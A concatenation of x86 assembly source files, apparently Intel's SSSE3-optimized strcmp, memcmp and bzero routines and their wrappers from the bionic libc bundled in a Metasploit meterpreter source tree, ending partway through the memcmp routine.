movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $12, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_12)
.p2align 4
L(nibble_ashr_12):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xf000, %esi
jnz L(ashr_12_exittail)
#ifdef USE_AS_STRNCMP
cmp $4, %ebp
jbe L(ashr_12_exittail)
#endif
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_12)
.p2align 4
L(ashr_12_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $12, %xmm0
psrldq $12, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_13
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(3~15) n - 3 12(15 +(n-3) - n) ashr_13
*/
.p2align 4
L(ashr_13):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $3, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -3(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $13, %ebx
lea 13(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_13):
add $16, %edi
jg L(nibble_ashr_13)
L(gobble_ashr_13):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $13, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_13)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $13, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_13)
.p2align 4
L(nibble_ashr_13):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xe000, %esi
jnz L(ashr_13_exittail)
#ifdef USE_AS_STRNCMP
cmp $3, %ebp
jbe L(ashr_13_exittail)
#endif
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_13)
.p2align 4
L(ashr_13_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $13, %xmm0
psrldq $13, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_14
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(2~15) n - 2 13(15 +(n-2) - n) ashr_14
*/
.p2align 4
L(ashr_14):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $2, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -2(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $14, %ebx
lea 14(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_14):
add $16, %edi
jg L(nibble_ashr_14)
L(gobble_ashr_14):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $14, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_14)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $14, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_14)
.p2align 4
L(nibble_ashr_14):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xc000, %esi
jnz L(ashr_14_exittail)
#ifdef USE_AS_STRNCMP
cmp $2, %ebp
jbe L(ashr_14_exittail)
#endif
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_14)
.p2align 4
L(ashr_14_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $14, %xmm0
psrldq $14, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_14
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(1~15) n - 1 14(15 +(n-1) - n) ashr_15
*/
.p2align 4
L(ashr_15):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $1, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -1(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $15, %ebx
lea 15(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_15):
add $16, %edi
jg L(nibble_ashr_15)
L(gobble_ashr_15):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $15, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_15)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $15, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_15)
.p2align 4
L(nibble_ashr_15):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0x8000, %esi
jnz L(ashr_15_exittail)
#ifdef USE_AS_STRNCMP
cmp $1, %ebp
jbe L(ashr_15_exittail)
#endif
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_15)
.p2align 4
L(ashr_15_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $15, %xmm0
psrldq $15, %xmm3
jmp L(aftertail)
.p2align 4
L(aftertail):
pcmpeqb %xmm3, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
not %esi
L(exit):
mov %ebx, %edi
and $0x1f, %edi
lea -16(%edi, %ecx), %edi
L(less32bytes):
add %edi, %edx
add %ecx, %eax
test $0x20, %ebx
jz L(ret2)
xchg %eax, %edx
.p2align 4
L(ret2):
mov %esi, %ecx
POP (%esi)
POP (%edi)
POP (%ebx)
L(less16bytes):
test %cl, %cl
jz L(2next_8_bytes)
test $0x01, %cl
jnz L(Byte0)
test $0x02, %cl
jnz L(Byte1)
test $0x04, %cl
jnz L(Byte2)
test $0x08, %cl
jnz L(Byte3)
test $0x10, %cl
jnz L(Byte4)
test $0x20, %cl
jnz L(Byte5)
test $0x40, %cl
jnz L(Byte6)
#ifdef USE_AS_STRNCMP
cmp $7, %ebp
jbe L(eq)
#endif
movzx 7(%eax), %ecx
movzx 7(%edx), %eax
sub %ecx, %eax
RETURN
.p2align 4
L(Byte0):
#ifdef USE_AS_STRNCMP
cmp $0, %ebp
jbe L(eq)
#endif
movzx (%eax), %ecx
movzx (%edx), %eax
sub %ecx, %eax
RETURN
.p2align 4
L(Byte1):
#ifdef USE_AS_STRNCMP
cmp $1, %ebp
jbe L(eq)
#endif
movzx 1(%eax), %ecx
movzx 1(%edx), %eax
sub %ecx, %eax
RETURN
.p2align 4
L(Byte2):
#ifdef USE_AS_STRNCMP
cmp $2, %ebp
jbe L(eq)
#endif
movzx 2(%eax), %ecx
movzx 2(%edx), %eax
sub %ecx, %eax
RETURN
.p2align 4
L(Byte3):
#ifdef USE_AS_STRNCMP
cmp $3, %ebp
jbe L(eq)
#endif
movzx 3(%eax), %ecx
movzx 3(%edx), %eax
sub %ecx, %eax
RETURN
.p2align 4
L(Byte4):
#ifdef USE_AS_STRNCMP
cmp $4, %ebp
jbe L(eq)
#endif
movzx 4(%eax), %ecx
movzx 4(%edx), %eax
sub %ecx, %eax
RETURN
.p2align 4
L(Byte5):
#ifdef USE_AS_STRNCMP
cmp $5, %ebp
jbe L(eq)
#endif
movzx 5(%eax), %ecx
movzx 5(%edx), %eax
sub %ecx, %eax
RETURN
.p2align 4
L(Byte6):
#ifdef USE_AS_STRNCMP
cmp $6, %ebp
jbe L(eq)
#endif
movzx 6(%eax), %ecx
movzx 6(%edx), %eax
sub %ecx, %eax
RETURN
.p2align 4
L(2next_8_bytes):
add $8, %eax
add $8, %edx
#ifdef USE_AS_STRNCMP
cmp $8, %ebp
lea -8(%ebp), %ebp
jbe L(eq)
#endif
test $0x01, %ch
jnz L(Byte0)
test $0x02, %ch
jnz L(Byte1)
test $0x04, %ch
jnz L(Byte2)
test $0x08, %ch
jnz L(Byte3)
test $0x10, %ch
jnz L(Byte4)
test $0x20, %ch
jnz L(Byte5)
test $0x40, %ch
jnz L(Byte6)
#ifdef USE_AS_STRNCMP
cmp $7, %ebp
jbe L(eq)
#endif
movzx 7(%eax), %ecx
movzx 7(%edx), %eax
sub %ecx, %eax
RETURN
.p2align 4
L(neq):
mov $1, %eax
ja L(neq_bigger)
neg %eax
L(neq_bigger):
RETURN
#ifdef USE_AS_STRNCMP
CFI_PUSH (%ebx)
CFI_PUSH (%edi)
CFI_PUSH (%esi)
.p2align 4
L(more8byteseq):
POP (%esi)
POP (%edi)
POP (%ebx)
#endif
L(eq):
#ifdef USE_AS_STRNCMP
POP (%ebp)
#endif
xorl %eax, %eax
ret
#ifdef USE_AS_STRNCMP
CFI_PUSH (%ebp)
.p2align 4
L(less16bytes_sncmp):
test %ebp, %ebp
jz L(eq)
movzbl (%eax), %ecx
cmpb %cl, (%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $1, %ebp
je L(eq)
movzbl 1(%eax), %ecx
cmpb %cl, 1(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $2, %ebp
je L(eq)
movzbl 2(%eax), %ecx
cmpb %cl, 2(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $3, %ebp
je L(eq)
movzbl 3(%eax), %ecx
cmpb %cl, 3(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $4, %ebp
je L(eq)
movzbl 4(%eax), %ecx
cmpb %cl, 4(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $5, %ebp
je L(eq)
movzbl 5(%eax), %ecx
cmpb %cl, 5(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $6, %ebp
je L(eq)
movzbl 6(%eax), %ecx
cmpb %cl, 6(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $7, %ebp
je L(eq)
movzbl 7(%eax), %ecx
cmpb %cl, 7(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $8, %ebp
je L(eq)
movzbl 8(%eax), %ecx
cmpb %cl, 8(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $9, %ebp
je L(eq)
movzbl 9(%eax), %ecx
cmpb %cl, 9(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $10, %ebp
je L(eq)
movzbl 10(%eax), %ecx
cmpb %cl, 10(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $11, %ebp
je L(eq)
movzbl 11(%eax), %ecx
cmpb %cl, 11(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $12, %ebp
je L(eq)
movzbl 12(%eax), %ecx
cmpb %cl, 12(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $13, %ebp
je L(eq)
movzbl 13(%eax), %ecx
cmpb %cl, 13(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $14, %ebp
je L(eq)
movzbl 14(%eax), %ecx
cmpb %cl, 14(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $15, %ebp
je L(eq)
movzbl 15(%eax), %ecx
cmpb %cl, 15(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
POP (%ebp)
xor %eax, %eax
ret
#endif
END (ssse3_strcmp_latest)
|
OpenWireSec/metasploit | 1,719 | external/source/meterpreter/source/bionic/libc/arch-x86/string/bzero_wrapper.S | /*
Copyright (c) 2010, Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#if defined(USE_SSE2)
# include "cache_wrapper.S"
# undef __i686
# define USE_AS_BZERO
# define sse2_memset5_atom bzero
# include "sse2-memset5-atom.S"
#else
# include "bzero.S"
#endif
|
OpenWireSec/metasploit | 1,642 | external/source/meterpreter/source/bionic/libc/arch-x86/string/memcmp_wrapper.S | /*
Copyright (c) 2010, Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#if defined(USE_SSSE3)
# define MEMCMP memcmp
# include "ssse3-memcmp3.S"
#else
# include "memcmp.S"
#endif
|
OpenWireSec/metasploit | 1,681 | external/source/meterpreter/source/bionic/libc/arch-x86/string/strncmp_wrapper.S | /*
Copyright (c) 2010, Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#if defined(USE_SSSE3)
# define USE_AS_STRNCMP
# define ssse3_strcmp_latest strncmp
# include "ssse3-strcmp.S"
#else
# include "strncmp.S"
#endif
|
OpenWireSec/metasploit | 34,936 | external/source/meterpreter/source/bionic/libc/arch-x86/string/ssse3-memcmp3.S | /*
Copyright (c) 2010, Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#ifndef MEMCMP
# define MEMCMP ssse3_memcmp3_new
#endif
#ifndef L
# define L(label) .L##label
#endif
#ifndef ALIGN
# define ALIGN(n) .p2align n
#endif
#ifndef cfi_startproc
# define cfi_startproc .cfi_startproc
#endif
#ifndef cfi_endproc
# define cfi_endproc .cfi_endproc
#endif
#ifndef cfi_rel_offset
# define cfi_rel_offset(reg, off) .cfi_rel_offset reg, off
#endif
#ifndef cfi_restore
# define cfi_restore(reg) .cfi_restore (reg)
#endif
#ifndef cfi_adjust_cfa_offset
# define cfi_adjust_cfa_offset(off) .cfi_adjust_cfa_offset off
#endif
#ifndef ENTRY
# define ENTRY(name) \
.type name, @function; \
.globl name; \
.p2align 4; \
name: \
cfi_startproc
#endif
#ifndef END
# define END(name) \
cfi_endproc; \
.size name, .-name
#endif
#define CFI_PUSH(REG) \
cfi_adjust_cfa_offset (4); \
cfi_rel_offset (REG, 0)
#define CFI_POP(REG) \
cfi_adjust_cfa_offset (-4); \
cfi_restore (REG)
#define PUSH(REG) pushl REG; CFI_PUSH (REG)
#define POP(REG) popl REG; CFI_POP (REG)
#define PARMS 4
#define BLK1 PARMS
#define BLK2 BLK1+4
#define LEN BLK2+4
#define RETURN_END POP (%edi); POP (%esi); POP (%ebx); ret
#define RETURN RETURN_END; CFI_PUSH (%ebx); CFI_PUSH (%edi); \
CFI_PUSH (%esi)
.section .text.ssse3,"ax",@progbits
ENTRY (MEMCMP)
movl LEN(%esp), %ecx
movl BLK1(%esp), %eax
cmp $48, %ecx
movl BLK2(%esp), %edx
jae L(48bytesormore)
cmp $1, %ecx
jbe L(less1bytes)
PUSH (%ebx)
add %ecx, %edx
add %ecx, %eax
jmp L(less48bytes)
CFI_POP (%ebx)
ALIGN (4)
L(less1bytes):
jb L(zero)
movb (%eax), %cl
cmp (%edx), %cl
je L(zero)
mov $1, %eax
ja L(1bytesend)
neg %eax
L(1bytesend):
ret
ALIGN (4)
L(zero):
mov $0, %eax
ret
ALIGN (4)
L(48bytesormore):
PUSH (%ebx)
PUSH (%esi)
PUSH (%edi)
movdqu (%eax), %xmm3
movdqu (%edx), %xmm0
movl %eax, %edi
movl %edx, %esi
pcmpeqb %xmm0, %xmm3
pmovmskb %xmm3, %edx
lea 16(%edi), %edi
sub $0xffff, %edx
lea 16(%esi), %esi
jnz L(less16bytes)
mov %edi, %edx
and $0xf, %edx
xor %edx, %edi
sub %edx, %esi
add %edx, %ecx
mov %esi, %edx
and $0xf, %edx
jz L(shr_0)
xor %edx, %esi
cmp $8, %edx
jae L(next_unaligned_table)
cmp $0, %edx
je L(shr_0)
cmp $1, %edx
je L(shr_1)
cmp $2, %edx
je L(shr_2)
cmp $3, %edx
je L(shr_3)
cmp $4, %edx
je L(shr_4)
cmp $5, %edx
je L(shr_5)
cmp $6, %edx
je L(shr_6)
jmp L(shr_7)
ALIGN (4)
L(next_unaligned_table):
cmp $8, %edx
je L(shr_8)
cmp $9, %edx
je L(shr_9)
cmp $10, %edx
je L(shr_10)
cmp $11, %edx
je L(shr_11)
cmp $12, %edx
je L(shr_12)
cmp $13, %edx
je L(shr_13)
cmp $14, %edx
je L(shr_14)
jmp L(shr_15)
ALIGN (4)
L(shr_0):
cmp $80, %ecx
jae L(shr_0_gobble)
lea -48(%ecx), %ecx
xor %eax, %eax
movaps (%esi), %xmm1
pcmpeqb (%edi), %xmm1
movaps 16(%esi), %xmm2
pcmpeqb 16(%edi), %xmm2
pand %xmm1, %xmm2
pmovmskb %xmm2, %edx
add $32, %edi
add $32, %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea (%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_0_gobble):
lea -48(%ecx), %ecx
movdqa (%esi), %xmm0
xor %eax, %eax
pcmpeqb (%edi), %xmm0
sub $32, %ecx
movdqa 16(%esi), %xmm2
pcmpeqb 16(%edi), %xmm2
L(shr_0_gobble_loop):
pand %xmm0, %xmm2
sub $32, %ecx
pmovmskb %xmm2, %edx
movdqa %xmm0, %xmm1
movdqa 32(%esi), %xmm0
movdqa 48(%esi), %xmm2
sbb $0xffff, %edx
pcmpeqb 32(%edi), %xmm0
pcmpeqb 48(%edi), %xmm2
lea 32(%edi), %edi
lea 32(%esi), %esi
jz L(shr_0_gobble_loop)
pand %xmm0, %xmm2
cmp $0, %ecx
jge L(shr_0_gobble_loop_next)
inc %edx
add $32, %ecx
L(shr_0_gobble_loop_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm2, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea (%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_1):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_1_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $1,(%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $1,%xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 1(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_1_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $1,(%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $1,16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_1_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $1,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $1,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_1_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_1_gobble_next)
inc %edx
add $32, %ecx
L(shr_1_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 1(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_2):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_2_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $2,(%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $2,%xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 2(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_2_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $2,(%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $2,16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_2_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $2,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $2,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_2_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
